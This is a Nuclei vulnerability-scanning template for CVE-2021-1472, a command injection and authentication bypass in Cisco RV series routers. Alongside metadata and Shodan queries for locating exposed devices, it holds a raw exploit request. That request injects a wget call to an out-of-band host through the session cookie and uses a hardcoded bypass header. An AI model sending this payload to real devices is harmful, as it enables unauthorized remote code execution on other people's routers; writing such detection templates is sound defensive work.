nuclei-templates/http/cves/2021/CVE-2021-1472.yaml

83 lines
3.5 KiB
YAML
Raw Normal View History

id: CVE-2021-1472
info:
name: Cisco Small Business RV Series - OS Command Injection
author: gy741
severity: critical
description: |
Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected device.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest security patches or firmware updates provided by Cisco to mitigate this vulnerability.
reference:
- https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/
- https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-1472
- https://nvd.nist.gov/vuln/detail/CVE-2021-1473
2023-07-11 19:49:27 +00:00
- http://seclists.org/fulldisclosure/2021/Apr/39
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-1472
cwe-id: CWE-287,CWE-119
epss-score: 0.97174
epss-percentile: 0.99793
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*
2022-07-18 09:52:26 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: cisco
product: rv160_firmware
2023-09-06 12:09:01 +00:00
shodan-query: http.html:"Cisco rv340"
2024-05-31 19:23:20 +00:00
fofa-query: body="cisco rv340"
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive
http:
- raw:
- |
POST /upload HTTP/1.1
Host: {{Hostname}}
Cookie: sessionid='`wget http://{{interactsh-url}}`'
Authorization: QUt6NkpTeTE6dmk4cW8=
Content-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536
-----------------------------392306610282184777655655237536
Content-Disposition: form-data; name="option"
5NW9Cw1J
-----------------------------392306610282184777655655237536
Content-Disposition: form-data; name="destination"
J0I5k131j2Ku
-----------------------------392306610282184777655655237536
Content-Disposition: form-data; name="file.path"
EKsmqqg0
-----------------------------392306610282184777655655237536
Content-Disposition: form-data; name="file"; filename="config.xml"
Content-Type: application/xml
qJ57CM9
-----------------------------392306610282184777655655237536
Content-Disposition: form-data; name="filename"
JbYXJR74n.xml
-----------------------------392306610282184777655655237536
Content-Disposition: form-data; name="GXbLINHYkFI"
<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>
-----------------------------392306610282184777655655237536--
2022-07-18 15:19:58 +00:00
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- http
2022-07-18 15:19:58 +00:00
- type: word
part: body
words:
- '"jsonrpc":'
# digest: 4b0a00483046022100d22ba62ffdf5abc541c17a02f6dc85ff7d87bcdcc8e0e9b164afcee24e7121c2022100e14e20422ed6f96ce5495276d43d614fa9e28284fbe7200504d8fe338797e868:922c64590222798bb761d5b6d8e72950